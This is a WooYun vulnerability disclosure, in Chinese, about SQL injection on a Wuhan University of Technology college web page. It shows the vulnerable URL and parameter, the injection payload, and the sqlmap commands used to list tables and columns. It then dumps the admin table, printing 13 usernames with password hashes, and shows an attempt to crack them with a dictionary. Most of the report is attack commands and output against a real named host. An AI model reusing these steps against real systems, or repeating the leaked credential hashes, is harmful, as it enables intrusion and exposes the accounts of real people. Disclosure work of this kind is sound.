当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144090

漏洞标题:武汉理工大学学院网站存在SQL注射漏洞(可获取管理员账号)

相关厂商:武汉理工大学

漏洞作者: 路人甲

提交时间:2015-09-29 21:29

修复时间:2015-10-13 06:30

公开时间:2015-10-13 06:30

漏洞类型:网络设计缺陷/逻辑错误

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-29: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

武汉理工大学学院网站存在SQL注射漏洞(可获取管理员账号)

详细说明:

http://pub2.whut.edu.cn/icea/civilsite/teacherdetail.asp?classid=42&id=78
参数:id

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=42&id=78 AND 4881=4881
---
[16:06:46] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[16:06:46] [INFO] fetched data logged to text files under 'C:\\.sqlm
ap\output\pub2.whut.edu.cn'
[*] shutting down at 16:06:46
C:\>python e:\sqlmap\sqlmap.py -u "http://pub2.whut.edu.cn/icea/civi
lsite/teacherdetail.asp?classid=42&id=78" -p"id" --tables
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150925}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:07:10
[16:07:11] [INFO] resuming back-end DBMS 'microsoft access'
[16:07:11] [INFO] testing connection to the target URL
[16:07:11] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=42&id=78 AND 4881=4881
---
[16:07:11] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[16:07:11] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[16:07:11] [INFO] fetching number of tables for database 'Microsoft_Access_maste
rdb'
[16:07:11] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[16:07:11] [INFO] retrieved:
[16:07:12] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast'
[16:07:12] [WARNING] unable to retrieve the number of tables for database 'Micro
soft_Access_masterdb'
[16:07:12] [ERROR] cannot retrieve table names, back-end DBMS is Access
Database: Microsoft_Access_masterdb
[3 tables]
+---------+
| admin |
| article |
| photo |
+---------+
[16:07:12] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[16:07:12] [INFO] fetched data logged to text files under 'C:\\.sqlm
ap\output\pub2.whut.edu.cn'
[*] shutting down at 16:07:12
C:\>python e:\sqlmap\sqlmap.py -u "http://pub2.whut.edu.cn/icea/civi
lsite/teacherdetail.asp?classid=42&id=78" -p"id" --columns -T"admin"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150925}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:10:12
[16:10:12] [INFO] resuming back-end DBMS 'microsoft access'
[16:10:12] [INFO] testing connection to the target URL
[16:10:12] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=42&id=78 AND 4881=4881
---
[16:10:13] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[16:10:13] [ERROR] cannot retrieve column names, back-end DBMS is Access
Database: Microsoft_Access_masterdb
Table: admin
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | numeric |
| pass | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
[16:10:13] [INFO] fetched data logged to text files under 'C:\\.sqlm
ap\output\pub2.whut.edu.cn'
[*] shutting down at 16:10:13
C:\>python e:\sqlmap\sqlmap.py -u "http://pub2.whut.edu.cn/icea/civi
lsite/teacherdetail.asp?classid=42&id=78" -p"id" --dump -T"admin"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150925}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:10:38
[16:10:38] [INFO] resuming back-end DBMS 'microsoft access'
[16:10:38] [INFO] testing connection to the target URL
[16:10:39] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=42&id=78 AND 4881=4881
---
[16:10:39] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[16:10:39] [ERROR] cannot retrieve column names, back-end DBMS is Access
[16:10:39] [INFO] fetching entries for table 'admin' in database 'Microsoft_Acce
ss_masterdb'
[16:10:39] [INFO] fetching number of entries for table 'admin' in database 'Micr
osoft_Access_masterdb'
[16:10:39] [INFO] resumed: 13
[16:10:39] [INFO] fetching number of distinct values for column 'id'
[16:10:39] [INFO] resumed: 13
[16:10:39] [INFO] using column 'id' as a pivot for retrieving row data
[16:10:39] [INFO] resumed: 13
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: 975a0c3c66a55a67
[16:10:39] [INFO] resumed: tjxybkjy
[16:10:39] [INFO] resumed: 16
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: 5aa765d61d8327de
[16:10:39] [INFO] resumed: tjxynews
[16:10:39] [INFO] resumed: 17
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: 0faa14a6f2dca5c2
[16:10:39] [INFO] resumed: tujianxueyuan
[16:10:39] [INFO] resumed: 29
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: 5b071c98f8674410
[16:10:39] [INFO] resumed: tmzzb
[16:10:39] [INFO] resumed: 39
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: ff6da1b986453874
[16:10:39] [INFO] resumed: tmxzb
[16:10:39] [INFO] resumed: 62
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: 0730b85b8f774aa2
[16:10:39] [INFO] resumed: liujins
[16:10:39] [INFO] resumed: 64
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: 515694fde5eac5e0
[16:10:39] [INFO] resumed: lvxiangdu
[16:10:39] [INFO] resumed: 65
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: eaa249e9a15e643f
[16:10:39] [INFO] resumed: yanhui
[16:10:39] [INFO] resumed: 66
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: 2ed6cd532626981e
[16:10:39] [INFO] resumed: hugaofeng
[16:10:39] [INFO] resumed: 67
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: 1705274ed5b956ea
[16:10:39] [INFO] resumed: liuboshi
[16:10:39] [INFO] resumed: 68
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: 7c3be9f2d8ced694
[16:10:39] [INFO] resumed: shidengfeng
[16:10:39] [INFO] resumed: 69
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: 6c8677355e9a84d2
[16:10:39] [INFO] resumed: slyjs
[16:10:39] [INFO] resumed: 70
[16:10:39] [INFO] resumed: tjxy
[16:10:39] [INFO] resumed: b11787837939d414
[16:10:39] [INFO] resumed: fqhhs
[16:10:39] [INFO] analyzing table dump for possible password hashes
[16:10:39] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] y
[16:10:42] [INFO] writing hashes to a temporary file 'C:\\appdata\lo
cal\temp\sqlmap3swl0f18296\sqlmaphashes-jyqspk.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:10:43] [INFO] using hash method 'mysql_old_passwd'
what dictionary do you want to use?
[1] default dictionary file 'e:\sqlmap\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[16:10:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[16:10:48] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[16:10:48] [INFO] starting 4 processes
[16:11:13] [INFO] using suffix '1'
[16:11:45] [INFO] using suffix '123'
[16:12:30] [INFO] using suffix '2'
[16:13:00] [INFO] using suffix '12'
[16:13:36] [INFO] using suffix '3'
[16:14:13] [INFO] using suffix '13'
[16:14:47] [INFO] using suffix '7'
[16:15:19] [INFO] using suffix '11'
[16:15:55] [INFO] using suffix '5'
[16:16:23] [INFO] using suffix '22'
[16:16:57] [INFO] using suffix '23'
[16:17:40] [INFO] using suffix '01'
[16:18:20] [INFO] using suffix '4'
[16:18:51] [INFO] using suffix '07'
[16:19:19] [INFO] using suffix '21'
[16:19:51] [INFO] using suffix '14'
[16:20:23] [INFO] using suffix '10'
[16:20:55] [INFO] using suffix '06'
[16:21:26] [INFO] using suffix '08'
[16:22:00] [INFO] using suffix '8'
[16:22:35] [INFO] using suffix '15'
[16:23:05] [INFO] using suffix '69'
[16:23:33] [INFO] using suffix '16'
[16:24:00] [INFO] using suffix '6'
[16:24:27] [INFO] using suffix '18'
[16:24:56] [INFO] using suffix '!'
[16:25:23] [INFO] using suffix '.'
[16:25:48] [INFO] using suffix '*'
[16:26:14] [INFO] using suffix '!!'
[16:26:41] [INFO] using suffix '?'
[16:27:12] [INFO] using suffix ';'
[16:27:41] [INFO] using suffix '..'
[16:28:12] [INFO] using suffix '!!!'
[16:28:42] [INFO] using suffix ', '
[16:29:11] [INFO] using suffix '@'
[16:29:39] [WARNING] no clear password(s) found
[16:29:39] [INFO] postprocessing table dump
Database: Microsoft_Access_masterdb
Table: admin
[13 entries]
+----+------+---------------+------------------+
| id | pass | username | password |
+----+------+---------------+------------------+
| 13 | tjxy | tjxybkjy | 975a0c3c66a55a67 |
| 16 | tjxy | tjxynews | 5aa765d61d8327de |
| 17 | tjxy | tujianxueyuan | 0faa14a6f2dca5c2 |
| 29 | tjxy | tmzzb | 5b071c98f8674410 |
| 39 | tjxy | tmxzb | ff6da1b986453874 |
| 62 | tjxy | liujins | 0730b85b8f774aa2 |
| 64 | tjxy | lvxiangdu | 515694fde5eac5e0 |
| 65 | tjxy | yanhui | eaa249e9a15e643f |
| 66 | tjxy | hugaofeng | 2ed6cd532626981e |
| 67 | tjxy | liuboshi | 1705274ed5b956ea |
| 68 | tjxy | shidengfeng | 7c3be9f2d8ced694 |
| 69 | tjxy | slyjs | 6c8677355e9a84d2 |
| 70 | tjxy | fqhhs | b11787837939d414 |
+----+------+---------------+------------------+
[16:29:39] [INFO] table 'Microsoft_Access_masterdb.admin' dumped to CSV file 'C:
\Users\ZXYZXY\.sqlmap\output\pub2.whut.edu.cn\dump\Microsoft_Access_masterdb\adm
in.csv'
[16:29:39] [INFO] fetched data logged to text files under 'C:\\.sqlm
ap\output\pub2.whut.edu.cn'
[*] shutting down at 16:29:39

漏洞证明:

tables.jpg

pwd.jpg

管理员.jpg

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-13 06:30

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无